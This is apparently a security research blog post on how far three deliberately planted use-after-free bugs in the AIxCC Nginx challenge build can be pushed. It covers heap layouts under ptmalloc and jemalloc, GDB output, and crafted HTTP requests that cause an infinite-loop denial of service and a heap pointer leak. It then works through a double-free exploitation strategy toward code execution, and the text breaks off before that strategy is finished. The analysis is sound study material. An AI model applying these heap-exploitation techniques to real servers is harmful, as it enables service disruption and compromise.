This blog post will analyse the exploitability of the temporal safety vulnerabilities in Nginx AIxCC.
AIxCC is a DARPA competition to find vulnerabilities in codebases using AI. The competitors are not looking for 0-days but rather intentionally added vulnerabilities in existing codebases. One of them was Nginx in the semifinals, which already took place.
In this blog post, I will have a different focus on whether these added vulnerabilities can be exploited to achieve more than just crashes.
Hopefully, this writeup can serve as a useful exploration of a bit of Nginx internals for exploitation, as public exploits for memory corruption bugs in Nginx are virtually nonexistent. I will be analysing the bugs CPV9, CPV11 and CPV17, details of which can be found in the official AIxCC repo.
The system I am testing on is Ubuntu 24.04. I will consider two allocators: jemalloc and ptmalloc. I’m testing jemalloc too because it’s a high-performance allocator that is used in systems such as FreeBSD. I will also test with optimisations O3
enabled, for example:
./configure --with-mail --with-http_v2_module --with-cc-opt='-ggdb -O3' --error-log-path=/tmp/nginx/error.log --http-log-path=/tmp/nginx/access.log --pid-path=/tmp/nginx/nginx.pid
Change the configure command to O3
or O0
as required.
TL;DR
\ | ptmalloc, O0 | ptmalloc, O3 | jemalloc, O0 | jemalloc, O3 |
---|---|---|---|---|
CPV9 | DoS | DoS | DoS | More severe DoS (CPU hogging) |
CPV11 | DoS | DoS | Information leak | Information leak |
CPV17 | DoS | DoS | RCE (chaining with CPV11 infoleak) | RCE (chaining with CPV11 infoleak) |
CPV9: Linked-list node UAF
Bug analysis
The heap UAF in CPV9, as triggered by the officially released vulnerable blob, results in a crash due to NULL pointer dereference as a result of UAF. Is it exploitable? Can we craft HTTP requests that don’t result in a NULL dereference?
The bug lies in the deletion of blacklist entries in ngx_black_list_remove
. A blacklist object consists of a IP
pointer to a string object ngx_str_t
, and pointers to prev
and next
blacklist entries, linked in a doubly-linked list.
typedef struct ngx_black_list_s {
ngx_str_t *IP;
ngx_black_list_t *next;
ngx_black_list_t *prev;
}ngx_black_list_t;
*The ngx_black_list_s
structure.
In ngx_black_list_remove
, the linked list is traversed until an entry that has a matching IP
is found. Now, consider the scenario where the list is empty so reader
is NULL: a NULL dereference would happen in the for-loop due to accessing the next
field in reader = reader->next
.
This is not all. Now, consider the scenario where the remove_ip
argument in ngx_black_list_remove
matches the head of the linked list. The condition of the first if-statement will be satisfied, and the head node will be cleaned up and freed in ngx_destroy_black_list_link
. However, the next
and prev
fields of the deleted node are not cleared, and the head of the linked list is not updated. Therefore, subsequent use of the blacklist will always start traversing from the head, which is a dangling pointer to a node whose IP
pointer is NULL. The dangling pointer can be used at subsequent ngx_black_list_insert
, ngx_black_list_remove
and ngx_is_ip_banned
calls, and in all these cases, the worker process will crash due to NULL pointer dereference if IP
is NULL.
ngx_int_t
ngx_black_list_remove(ngx_black_list_t **black_list, u_char remove_ip[])
{
ngx_black_list_t *reader;
reader = *black_list;
if (reader && !ngx_strcmp(remove_ip, reader->IP->data)) {
ngx_destroy_black_list_link(reader);
return NGX_OK;
}
for (reader = reader->next; reader && reader->next; reader = reader->next) {
if (!ngx_strcmp(remove_ip, reader->IP->data)) {
ngx_double_link_remove(reader);
ngx_destroy_black_list_link(reader);
return NGX_OK;
}
}
return NGX_ERROR;
}
*The ngx_black_list_remove
function.
#define ngx_destroy_black_list_link(x) \
ngx_memzero((x)->IP->data, (x)->IP->len); \
ngx_free((x)->IP->data); \
(x)->IP->data = NULL; \
ngx_memzero((x)->IP, sizeof(ngx_str_t)); \
ngx_free((x)->IP); \
(x)->IP = NULL; \
ngx_memzero((x), sizeof(ngx_black_list_t)); \
ngx_free((x)); \
(x) = NULL;
*The ngx_destroy_black_list_link
macro that cleans up the node.
If we want to exploit this bug to achieve more than DoS, the first question is: can we craft HTTP requests that don’t result in a NULL dereference?
ptmalloc, without optimisations
After we free the blacklist head node, the head of the linked list will still point to the dangling pointer. Hmm, exploiting this in ptmalloc poses a problem: when the node is freed, IP
will be the mangled pointer to the next tcache chunk, which is not a valid memory address. Invoking either of ngx_is_ip_banned
, ngx_black_list_remove
and ngx_black_list_insert
would dereference IP
causing a fault. Therefore, we need to find a way to write a valid address to IP
, like for example overlapping another chunk allocated through ngx_alloc
(and not ngx_palloc
, which uses the pool allocator in Nginx).
gef➤ p *(ngx_black_list_t *)0x000058aed058b300
$7 = {
IP = 0x58ab5ab5b6ab,
next = 0x4000cf8d198122bd,
prev = 0x0
}
gef➤ x/10gx 0x000058aed058b300-0x10
0x58aed058b2f0: 0x0000000000000000 0x0000000000000021
0x58aed058b300: 0x000058ab5ab5b6ab 0x4000cf8d198122bd
0x58aed058b310: 0x0000000000000000 0x0000000000000021
After playing around with CodeQL, I couldn’t find a ngx_alloc
call where (1) the size argument is in the interval (0, 0x18], (2) the content can be partially controlled by the request input, and (3) the allocated chunk is not freed again before accessing through the dangling pointer. The third requirement is necessary for ptmalloc because the first 0x10 bytes of the chunk are used for inline metadata, which overlaps with the IP
and next
fields of ngx_black_list_t
. Invoking any function that accesses the dangling pointer would lead to a crash if either IP
or next
points to invalid memory.
Well, we can overlap the dangling pointer with another blacklist. The following is the code snippet that allocates memory for a new node. The first ngx_alloc
is used to contain the IP->data
string and will overlap with the dangling pointer to the freed blacklist head. The issue is that insert_ip
was validated to be a valid IP so we can only write digits 0-9 and dots. This is not enough to form a valid memory address, so any subsequent request will crash due to ngx_is_ip_banned
trying to access the corrupted head node. ugh
u_char* new_str = (u_char*)ngx_alloc(size, log); // overlaps with freed [node A]
for (size_t i = 0; i < size; i++) {
new_str[i] = insert_ip[i];
}
new_black_list = (ngx_black_list_t*)ngx_alloc(sizeof(ngx_black_list_t), log); // overlaps with [ A.str ]
new_black_list->IP = (ngx_str_t*)ngx_alloc(sizeof(ngx_str_t), log); // overlaps with [ A.str.data ]
new_black_list->IP->data = new_str;
new_black_list->IP->len = size;
new_black_list->next = NULL;
*Allocation of a blacklist node.
for (; reader; reader = reader->next) {
if (!ngx_strcmp(connection->addr_text.data, reader->IP->data)) {
ngx_close_connection(connection);
return NGX_ERROR;
}
}
*ngx_is_ip_banned
core logic.
#define ngx_is_valid_ip_char(x) (('0' <= (x) && (x) <= '9') || (x) == '.')
*Restriction of the character set for IP->data
I thought about: are there any application-specific exploits, which could, for example, erase a blacklist to effectively “break” this feature?
We can set next
to zero, which effectively erases the blacklist. But the IP
field would be set to an invalid address… again because I can only write digits and dots terminated with zeroes (no partial overwrite allowed).
Therefore, I think the highest impact of this bug is Denial of Service.
ptmalloc, with optimisations
With O3
, the blacklist node is not memzeroed. However, the problem of IP
pointing to invalid memory persists because of the inlined metadata for tcache. There are no appropriate heap gadgets to write a valid memory address at the IP
field of the UAF object.
Therefore, I think the highest impact of the bug is still Denial of Service.
jemalloc, without optimisations
We point to jemalloc like this:
LD_PRELOAD=/usr/local/lib/libjemalloc.so objs/nginx -c /home/roundofthree/challenge-004-nginx-source/cp9/test.conf
The issue of mangling of the IP
field doesn’t exist for jemalloc because jemalloc doesn’t inline heap metadata, but IP
is zeroed if Nginx is compiled without optimisations.
And from the heap gadgets we have, I couldn’t find a way to write a valid memory address at IP
. Any reuse of the UAF blacklist node would lead to a crash. ugh
Therefore, I think the highest impact of the bug is still Denial of Service.
jemalloc, with optimisations
With optimisations, IP
is not zeroed so the UAF node can be reused without crashing. IP
would point to freed memory too.
Using this request to trigger UAF and reallocation,
GET / HTTP/1.1
Host: localhost:9999
User-Agent: curl/7.81.0
Accept: */*
Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;
White-List: 111.111.111.111;
Black-List: 444.444.444.444;
Before removing the first node,
gef➤ p **(ngx_black_list_t **)0x783ffe04ab70
$3 = {
IP = 0x783ffe01d060,
next = 0x783ffe0340e0,
prev = 0x0
}
gef➤ p *(ngx_str_t *)0x783ffe01d060
$4 = {
len = 0x10,
data = 0x783ffe01d050 "111.111.111.111"
}
After removing the first node and inserting a new node, the new node overlaps with the first node (unlike in ptmalloc, jemalloc has sizeclasses for 0x10 and 0x20 bytes) but the IP
and IP->data
pointers are swapped due to malloc/free ordering. It leaves the first node in a valid state, so the process doesn’t crash. But the next
and prev
pointers form a circle.
gef➤ p *(ngx_black_list_t *)0x0000783ffe0340c0
$19 = {
IP = 0x783ffe01d050,
next = 0x783ffe0340c0,
prev = 0x783ffe0340c0
}
gef➤ p *(ngx_str_t *)0x783ffe01d050
$16 = {
len = 0x10,
data = 0x783ffe01d060 "444.444.444.444"
}
Inserting a new node would lead to an infinite traversal. Removing a node would return to the same application state as before. We are limited here because we don’t have sufficient head gadgets of the same sizeclass. If we free twice the object, the second free would crash the process because the IP
object is memzeroed.
Although not RCE, corrupting a linked list to trigger an infinite traversal is likely a more severe DoS attack than just crashing the process, because the infinite traversal is hogging the worker process.
$ nc localhost 8080
GET / HTTP/1.1
Host: localhost:9999
User-Agent: curl/7.81.0
Accept: */*
Ctrl+C
[#0] 0x783ffe98afa0 → __strcmp_avx2()
[#1] 0x64fb3d0b5968 → ngx_is_ip_banned(cycle=<optimised out>, connection=0x783ffe08e720)
[#2] 0x64fb3d0dd987 → ngx_http_wait_request_handler(rev=0x783ffe0af600)
[#3] 0x64fb3d0cdd15 → ngx_epoll_process_events(cycle=0x783ffe04a8d0, timer=<optimised out>, flags=0x1)
[#4] 0x64fb3d0c39ca → ngx_process_events_and_timers(cycle=0x783ffe04a8d0)
[#5] 0x64fb3d0cbae0 → ngx_worker_process_cycle(cycle=0x783ffe04a8d0, data=0x0)
[#6] 0x64fb3d0ca05a → ngx_spawn_process(cycle=0x783ffe04a8d0, proc=0x64fb3d0cba50 <ngx_worker_process_cycle>, data=0x0, name=0x64fb3d1454da "worker process", respawn=0xfffffffffffffffd)
[#7] 0x64fb3d0cb428 → ngx_start_worker_processes(cycle=0x783ffe04a8d0, n=0x1, type=0xfffffffffffffffd)
[#8] 0x64fb3d0cc716 → ngx_master_process_cycle(cycle=0x783ffe04a8d0)
[#9] 0x64fb3d09dec2 → main(argc=<optimised out>, argv=<optimised out>)
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ c
Continuing.
*GDB showing infinite traversal in ngx_is_ip_banned
CPV11: UAF read
Bug analysis
CPV11 does not crash the Nginx process and it prints the host specifications even without remote admin privileges because the UAF buffer contains the host specifications. The object cycle->host_specs
is allocated in ngx_init_cycle
, and its fields host_cpu
, host_mem
and host_os
are initialised immediately after:
// [...]
cycle->host_specs->host_cpu = ngx_alloc(sizeof(ngx_str_t), log);
if (cycle->host_specs->host_cpu == NULL) {
ngx_destroy_pool(pool);
return NULL;
}
cycle->host_specs->host_cpu->data = (u_char*)"Unknown CPU\n";
ngx_memzero(line, NGX_MAX_HOST_SPECS_LINE);
fp = fopen("/proc/cpuinfo", "r");
if (fp != NULL) {
temp_char = NULL;
while (fgets(line, sizeof(line), fp) != NULL) {
if (ngx_strncmp(line, "model name", 10) == 0) {
temp_char = strchr(line, ':');
if (temp_char != NULL) {
temp_char += 2;
cycle->host_specs->host_cpu->data = ngx_alloc(sizeof(line), log);
if (cycle->host_specs->host_cpu->data == NULL) {
break;
}
ngx_memzero(cycle->host_specs->host_cpu->data, sizeof(line));
cycle->host_specs->host_cpu->len = \
ngx_sprintf(cycle->host_specs->host_cpu->data, "%s", temp_char) - \
cycle->host_specs->host_cpu->data;
break;
}
}
}
fclose(fp);
}
// [...]
The issue is, immediately after, the code checks that we configured remote_admin
and if not, it frees cycle->host_specs
but the reference to the freed object is kept.
ccf = (ngx_core_conf_t *) ngx_get_conf(cycle->conf_ctx, ngx_core_module);
if (!ccf->remote_admin) {
ngx_free(cycle->host_specs);
}
A quick grep concludes that the object cycle->host_specs
is used in ngx_http_get_host_specs
(with the other use in ngx_master_process_exit
, which tears down cycle->host_specs
). The dangling pointer can be dereferenced in ngx_http_get_host_specs
to print host specifications even if remote_admin
is not enabled.
static ngx_int_t ngx_http_get_host_specs(ngx_http_request_t *r,
ngx_http_variable_value_t *v, uintptr_t data)
{
u_char *temp;
v->data = ngx_pnalloc(r->pool, NGX_MAX_HOST_SPECS_LINE * 3);
if (v->data == NULL) {
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
ngx_memzero(v->data, NGX_MAX_HOST_SPECS_LINE * 3);
temp = v->data;
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_cpu->data); // NO CHERI crash CPV11 (UAF)
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_mem->data);
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_os->data);
v->len = v->data - temp;
v->data = temp;
return NGX_OK;
}
The vulnerable UAF object here is ngx_host_specs_t
, which falls in the 0x20 sizeclass (the object size is 0x18).
We suffer from the same lack of heap gadgets for the 0x20 sizeclass as for CPV9… The only gadget I know is the blacklist node, which is the vulnerable object in CPV9.
ptmalloc (with and without optimisations)
The freed ngx_host_specs_t
object, from the worker process, has the first two fields zeroed, while they are populated with heap metadata in the master thread. This is because the ngx_host_specs_t
object was freed in the master process and the master process wrote the tcache key and mangled next pointer in the first two fields of the allocation.
gef➤ p *(ngx_host_specs_t *)0x601a05991f40
$3 = {
host_cpu = 0x0,
host_mem = 0x0,
host_os = 0x601a05992040
}
*Worker process gdb view.
gef➤ p *(ngx_host_specs_t *)0x601a05991f40
$1 = {
host_cpu = 0x601a05991,
host_mem = 0xd213200cf2633c78,
host_os = 0x601a05992040
}
*Master process gdb view.
Because the freed ngx_host_specs_t
is in the tcache of the master process, I can’t overlap it with a blacklist node. Triggering the UAF read primitive in ngx_http_get_host_specs
will lead to a worker process crash DoS due to dereferencing an invalid pointer.
static ngx_int_t ngx_http_get_host_specs(ngx_http_request_t *r,
ngx_http_variable_value_t *v, uintptr_t data)
{
u_char *temp;
v->data = ngx_pnalloc(r->pool, NGX_MAX_HOST_SPECS_LINE * 3);
if (v->data == NULL) {
return NGX_HTTP_INTERNAL_SERVER_ERROR;
}
ngx_memzero(v->data, NGX_MAX_HOST_SPECS_LINE * 3);
temp = v->data;
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_cpu->data); // NO CHERI crash CPV11 (UAF)
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_mem->data);
v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_os->data);
v->len = v->data - temp;
v->data = temp;
return NGX_OK;
}
jemalloc (with and without optimisations)
This is the freed host specs object.
gef➤ p *(ngx_host_specs_t*)0x73e067a340a0
$2 = {
host_cpu = 0x73e067a1d020,
host_mem = 0x73e067a1d030,
host_os = 0x73e067a1d040
}
Then we make the first blacklist node overlap with the freed host specs object. prev
is still the previous host_os
pointer, IP
is a recently allocated ngx_str_t
and to make next
non-NULL, we allocate at least one more blacklist node. next
is a pointer to a blacklist node but we overlap it with host_mem
, which is an ngx_str_t
. So we allocate another blacklist node to fill in a pointer to host_mem->data
(overlapped with next->next
). When printing host specs, we leak the address of the IP
of the third node, 0x73e067a1d0a0
, which is a recently allocated heap object.
gef➤ p *(ngx_black_list_t *)0x73e067a340a0
$7 = {
IP = 0x73e067a1d060,
next = 0x73e067a340c0,
prev = 0x73e067a1d040
}
gef➤ p *(ngx_black_list_t *)0x73e067a340c0
$8 = {
IP = 0x73e067a1d080,
next = 0x73e067a340e0,
prev = 0x73e067a340a0
}
gef➤ p *(ngx_black_list_t *)0x73e067a340e0
$9 = {
IP = 0x73e067a1d0a0,
next = 0x0,
prev = 0x73e067a340c0
}
GET /host_specs HTTP/1.1
Host: localhost
Connection: Close
Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;444.444.444.444;
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Mon, 17 Feb 2025 17:06:18 GMT
Content-Type: text/plain
Content-Length: 63
Connection: close
Host Specifications:
111.111.111.111�Сg�s"Ubuntu 24.04.1 LTS"
There are only read primitives for this UAF object… So I reckon the highest impact I can get is information disclosure (leaking a heap pointer).
CPV17: UAF to double free?
Bug analysis
Triggering the heap UAF in CPV17 logs an application error because the UAF object, s->connection
, has its write
event object passed to ngx_mail_send
in ngx_mail_session_internal_server_error
, and the fd
corresponding to s->connection->write
is closed at the first free (ngx_mail_close_connection
), therefore causing a send() failed (9: Bad file descriptor)
error.
2025/02/04 00:06:22 [alert] 21598#0: *2 send() failed (9: Bad file descriptor) while in auth state, client: 127.0.0.1, server: 0.0.0.0:8080
2025/02/04 00:06:22 [alert] 21598#0: *2 connection already closed while in auth state, client: 127.0.0.1, server: 0.0.0.0:8080
*Nginx log snippet after triggering CPV17 using the officially released trigger blob.
According to the official CPV information,
This function attempts to access the freed connection structure, which leads to a crash via a UAF.
However, it doesn’t trigger a crash in jemalloc.
What is happening, then?
ngx_mail_send
calls ngx_mail_close_connection
because the fd
is cleared.
void
ngx_mail_send(ngx_event_t *wev)
{
ngx_int_t n;
ngx_connection_t *c;
ngx_mail_session_t *s;
ngx_mail_core_srv_conf_t *cscf;
c = wev->data;
s = c->data;
if (wev->timedout) {
ngx_log_error(NGX_LOG_INFO, c->log, NGX_ETIMEDOUT, "client timed out");
c->timedout = 1;
ngx_mail_close_connection(c);
return;
}
if (s->out.len == 0) {
if (ngx_handle_write_event(c->write, 0) != NGX_OK) {
ngx_mail_close_connection(c);
}
return;
}
n = c->send(c, s->out.data, s->out.len);
// [...]
if (n == NGX_ERROR) {
ngx_mail_close_connection(c); // HERE
return;
}
// [...]
Calling twice ngx_mail_close_connection
on the same connection object means calling ngx_close_connection
and ngx_destroy_pool
twice. Calling ngx_close_connection
is not useful because it checks that fd
is not -1. However, calling ngx_destroy_pool
twice on the same pool object can potentially corrupt the internal state of the memory allocator due to double free. Specifically, in ngx_destroy_pool
, the registered cleanup handler
functions are called, large allocations associated with the pool are freed again and the pool blocks are freed again to the system allocator.
void
ngx_mail_close_connection(ngx_connection_t *c)
{
ngx_pool_t *pool;
ngx_log_debug1(NGX_LOG_DEBUG_MAIL, c->log, 0,
"close mail connection: %d", c->fd);
#if (NGX_MAIL_SSL)
if (c->ssl) {
if (ngx_ssl_shutdown(c) == NGX_AGAIN) {
c->ssl->handler = ngx_mail_close_connection;
return;
}
}
#endif
#if (NGX_STAT_STUB)
(void) ngx_atomic_fetch_add(ngx_stat_active, -1);
#endif
c->destroyed = 1;
pool = c->pool;
ngx_close_connection(c);
ngx_destroy_pool(pool); // double free
}
ptmalloc (with and without optimisations)
Why does triggering the bug immediately lead to a crash in ptmalloc?
In the second call to ngx_mail_session_internal_server_error
, the mail session object s
from the line ngx_mail_send(s->connection->write);
points to a freed object, 0x5b33b60b0130
. Due to inline metadata, s->connection
is pointing to invalid memory corresponding to the inline tcache key. Therefore, for ptmalloc, triggering this bug would lead to an immediate crash.
gef➤ p s
$14 = (ngx_mail_session_t *) 0x5b33b60b0130
gef➤ heap bins
────────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────────
Tcachebins[idx=15, size=0x110, count=4] ← Chunk(addr=0x5b33b60f6700, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60b0020, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60b02c0, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60f6810, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=23, size=0x190, count=1] ← Chunk(addr=0x5b33b60b0130, size=0x190, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=28, size=0x1e0, count=1] ← Chunk(addr=0x5b33b60af2c0, size=0x1e0, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=63, size=0x410, count=2] ← Chunk(addr=0x5b33b60af520, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60afb10, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
gef➤ p s->connection
$15 = (ngx_connection_t *) 0x540bb4cf3bebdbec
Highest impact: DoS.
jemalloc (with and without optimisations)
Because jemalloc doesn’t have inline metadata, the worker process doesn’t crash before ngx_destroy_pool
is called twice on the same pool object. Thus, after triggering the bug, we have 4 double freed allocations (jemalloc doesn’t have any double free protection):
- Double free of 3 0x100 byte allocations (in the following case,
0x7caf42ac2200
,0x7caf42ac2100
and0x7caf42ac2000
), corresponding to the three pool blocks chained together. See the three allocations returning twice:
gef➤ p malloc(0x100)
$3 = (void *) 0x7caf42ac2200
gef➤ p malloc(0x100)
$4 = (void *) 0x7caf42ac2100
gef➤ p malloc(0x100)
$5 = (void *) 0x7caf42ac2000
gef➤ p malloc(0x100)
$6 = (void *) 0x7caf42ac2300
gef➤ p malloc(0x100)
$7 = (void *) 0x7caf42ac2200
gef➤ p malloc(0x100)
$8 = (void *) 0x7caf42ac2100
gef➤ p malloc(0x100)
$9 = (void *) 0x7caf42ac2000
gef➤ p malloc(0x100)
$10 = (void *) 0x7caf42ac2300
gef➤ p malloc(0x100)
$11 = (void *) 0x7caf42ac2400
gef➤ p malloc(0x100)
$12 = (void *) 0x7caf42ac2500
- Double free of one 0x1000 byte allocation (in the following case,
0x70388d020000
), corresponding to the large pool block in the double-freed pool:
gef➤ p malloc(0x1000)
$1 = (void *) 0x70388d020000
gef➤ p malloc(0x1000)
$2 = (void *) 0x70388d020000
gef➤ p malloc(0x1000)
$3 = (void *) 0x70388d023000
gef➤ p malloc(0x1000)
$4 = (void *) 0x70388d024000
I tried to 1) trigger the vuln and 2) send a simple HTTP GET request. The result is that the process crashes when trying to allocate from a corrupted pool. This is because the 0x1000 allocation is both used as the connection pool and as the next pool block (observe that the d.next
points to itself). So items allocated from the second pool block would corrupt the items in the first pool block. In this case, r->headers_in.headers
overlaps with the metadata in the first pool block, leaving current
to be an invalid address. This causes any subsequent pool allocations to crash…
gef➤ p *(ngx_pool_t*)0x70388d020000
$14 = {
d = {
last = 0x70388d020480 "P\254\004\2158p",
end = 0x70388d021000 "\t",
next = 0x70388d020000,
failed = 0x0
},
max = 0x30f5a8,
current = 0x4,
chain = 0x70388d03500f,
large = 0x9,
cleanup = 0x70388d035015,
log = 0x70388d01e060
}
What exactly corrupted the pool metadata? How can we avoid corrupting the pool metadata?
In ngx_http_process_request_line
, a list is allocated from the double-freed pool with size 20 * sizeof(ngx_table_elt_t) = 0x460
. This triggers the second pool block allocation.
if (ngx_list_init(&r->headers_in.headers, r->pool, 20,
sizeof(ngx_table_elt_t))
!= NGX_OK)
{
ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
break;
}
In ngx_http_process_request_headers
, for every header line that is parsed successfully, ngx_list_push
allocates memory from the second pool block, overwriting the overlapped pool block metadata.
/* a header line has been parsed successfully */
h = ngx_list_push(&r->headers_in.headers);
if (h == NULL) {
ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
break;
}
h->hash = r->header_hash;
h->key.len = r->header_name_end - r->header_name_start; // overlaps with `current`
h->key.data = r->header_name_start;
h->key.data[h->key.len] = '\0';
h->value.len = r->header_end - r->header_start;
h->value.data = r->header_start;
h->value.data[h->value.len] = '\0';
h->lowcase_key = ngx_pnalloc(r->pool, h->key.len); // crash due to the corruption above
How can we avoid corrupting the pool block metadata? The moment we process a successfully parsed header line, the process crashes. So we must either avoid processing a valid header or control the process flow before processing any headers. I made many attempts but I’ll highlight two approaches.
Attempt 1: Using the logger
I thought I could write partially controlled content to pool+0x20
by using the fact that the log handler allocates the buffer from the pool:
[#0] 0x5a4dfc6ade3e → ngx_http_log_body_bytes_sent(r=0x711c2b220050, buf=0x711c2b220452 "", op=0x711c2b24df58)
[#1] 0x5a4dfc6acc32 → ngx_http_log_handler(r=0x711c2b220050)
[#2] 0x5a4dfc6a7e1a → ngx_http_log_request(r=0x711c2b220050)
[#3] 0x5a4dfc6a7c67 → ngx_http_free_request(r=0x711c2b220050, rc=0x0)
[#4] 0x5a4dfc6a7b24 → ngx_http_close_request(r=0x711c2b220050, rc=0x0)
[#5] 0x5a4dfc6a765e → ngx_http_lingering_close_handler(rev=0x711c2b2a0e80)
[#6] 0x5a4dfc681068 → ngx_event_expire_timers()
[#7] 0x5a4dfc67ec08 → ngx_process_events_and_timers(cycle=0x711c2b24a4d0)
[#8] 0x5a4dfc68cfc7 → ngx_worker_process_cycle(cycle=0x711c2b24a4d0, data=0x0)
[#9] 0x5a4dfc689a91 → ngx_spawn_process(cycle=0x711c2b24a4d0, proc=0x5a4dfc68cf0b <ngx_worker_process_cycle>, data=0x0, name=0x5a4dfc74d887 "worker process", respawn=0x0)
gef➤ tele 0x711c2b220000
0x0000711c2b220000│+0x0000: 0x0000711c2b220480 → 0x0000711c2b24a4d0 → 0x0000711c2b24b780 → 0x0000711c2b24c370 → 0x0000000000000001
0x0000711c2b220008│+0x0008: 0x0000711c2b221000 → 0x0000000000000009 ("\t"?)
0x0000711c2b220010│+0x0010: 0x0000711c2b220000 → 0x0000711c2b220480 → 0x0000711c2b24a4d0 → 0x0000711c2b24b780 → 0x0000711c2b24c370 → 0x0000000000000001
0x0000711c2b220018│+0x0018: 0x0000000000000000
0x0000711c2b220020│+0x0020: "127.0.0.1 - - [19/Feb/2025:19:18:21 +0000] "aGET /[...]"
0x0000711c2b220028│+0x0028: "1 - - [19/Feb/2025:19:18:21 +0000] "aGET /very/lon[...]"
0x0000711c2b220030│+0x0030: "9/Feb/2025:19:18:21 +0000] "aGET /very/long/path/t[...]"
0x0000711c2b220038│+0x0038: "25:19:18:21 +0000] "aGET /very/long/path/that/keep[...]"
0x0000711c2b220040│+0x0040: ":21 +0000] "aGET /very/long/path/that/keeps/going/[...]"
0x0000711c2b220048│+0x0048: "0] "aGET /very/long/path/that/keeps/going/on/and/o[...]"
But there’s an issue: we can’t write NULL bytes and non-printable characters. This is what happens: these characters are sanitised.
gef➤ tele r->pool
0x00007b7aa7e20000│+0x0000: 0x00007b7aa7e2009d → 0x7555de17f0000061 ("a"?)
0x00007b7aa7e20008│+0x0008: 0x00007b7aa7e21000 → 0x0000000000000009 ("\t"?)
0x00007b7aa7e20010│+0x0010: 0x00007b7aa7e20000 → 0x00007b7aa7e2009d → 0x7555de17f0000061 ("a"?)
0x00007b7aa7e20018│+0x0018: 0x0000000000000000
0x00007b7aa7e20020│+0x0020: "127.0.0.1 - - [01/Mar/2025:16:29:13 +0000] "7\x13\[...]" ← $rsi
0x00007b7aa7e20028│+0x0028: "1 - - [01/Mar/2025:16:29:13 +0000] "7\x13\x00\x00\[...]"
0x00007b7aa7e20030│+0x0030: "1/Mar/2025:16:29:13 +0000] "7\x13\x00\x00\x00\x00\[...]"
0x00007b7aa7e20038│+0x0038: 0x39323a36313a3532
0x00007b7aa7e20040│+0x0040: 0x3030302b2033313a
0x00007b7aa7e20048│+0x0048: 0x31785c3722205d30
That’s a dead end. :(
Attempt 2: Large header buffer allocation
Let’s analyse the situation again.
HTTP requests consist of a request line followed by request headers. The request line is first parsed and processed in ngx_http_process_request_line
.
If the request line is invalid, Nginx finalises the request with NGX_HTTP_BAD_REQUEST
, leading to a crash due to log buffer overlap with the request object r
.
If the request line is valid, the input header list r->headers_in.headers
is allocated from the request pool r->pool
and the headers are then processed in ngx_http_process_request_headers
. Allocating the input header list causes the pool allocator to allocate another pool block to satisfy the request, and because of the double free, the obtained pool block overlaps with r->pool
. Then in ngx_http_process_request_headers
, the headers are parsed and processed one by one. As a result of processing the first valid header, r->pool
is corrupted, and the worker process crashes because ngx_pnalloc
is immediately called after corrupting the pool metadata. What if we don’t send any valid header to avoid this crash? If we don’t send any headers, nothing useful happens: the request is finalised and our input doesn’t overlap with anything useful before crashing. If we send an invalid header, the request is terminated with NGX_HTTP_BAD_REQUEST
.
This seems to be a dead end. I noticed that Nginx reads the input to a buffer of size 0x400 (client_header_buffer_size
), but if the request line or the headers exceed this limit, a large buffer of size large_client_header_buffers
is allocated instead. What if we allocate a large buffer that overlaps with r->pool
?
But the large buffer size is set to 8k by default… Let’s set that buffer size to 4k instead by setting large_client_header_buffers 4 4096;
, which is a totally sensible configuration (see the example configuration: https://nginx.org/en/docs/example.html).
The exploit strategy becomes:
- Allocate a large buffer for input data (
ngx_http_alloc_large_header_buffer
) that overlaps withr->pool
. - Write a less limited charset to fix and control fields of
ngx_pool_t
and/orngx_http_request_t
.
In what situations is ngx_http_alloc_large_header_buffer
called? It can be invoked during request line processing and request headers processing. If we choose to trigger a large buffer allocation during request line processingbecause the request line must be valid according to ngx_http_parse_request_line
to trigger a large buffer allocation, the character set we can write is too limited.
/* NGX_AGAIN: a request line parsing is still incomplete */
if (r->header_in->pos == r->header_in->end) {
rv = ngx_http_alloc_large_header_buffer(r, 1);
// [...]
1661 b = ngx_create_temp_buf(r->connection->pool,
1662 cscf->large_client_header_buffers.size); // 0x2000 changed to 0x1000
What if we don’t trigger a large buffer allocation during request line processing but during headers processing?
Remember that after processing a valid request line, the headers list will be allocated from the pool, causing the overlap of the new pool block with r->pool
. This is necessary to reach the code path to process request headers. This is an issue as we want the double-freed pointer to point to the large buffer. To solve this issue, I figured out that I could just trigger the double free bug again ;D.
Remember that if we don’t trigger a large allocation during request line processing and there is even one valid header, the application will crash. Therefore, we have to trigger a large allocation during headers processing and there mustn’t be any valid header.
We face the same problem before: the parsed header in the small buffer must have a valid syntax before proceeding to allocate a larger buffer for the remaining headers. This looks like a dead-end.
What if we make the (r->header_in->pos == r->header_in->end)
condition true using a request line of exactly the size of the small buffer, so that we trigger a large buffer allocation for the headers before validating the headers?
if (rc == NGX_AGAIN) {
if (r->header_in->pos == r->header_in->end) { // make this condition true before reaching `NGX_HTTP_PARSE_INVALID_HEADER`
rv = ngx_http_alloc_large_header_buffer(r, 0);
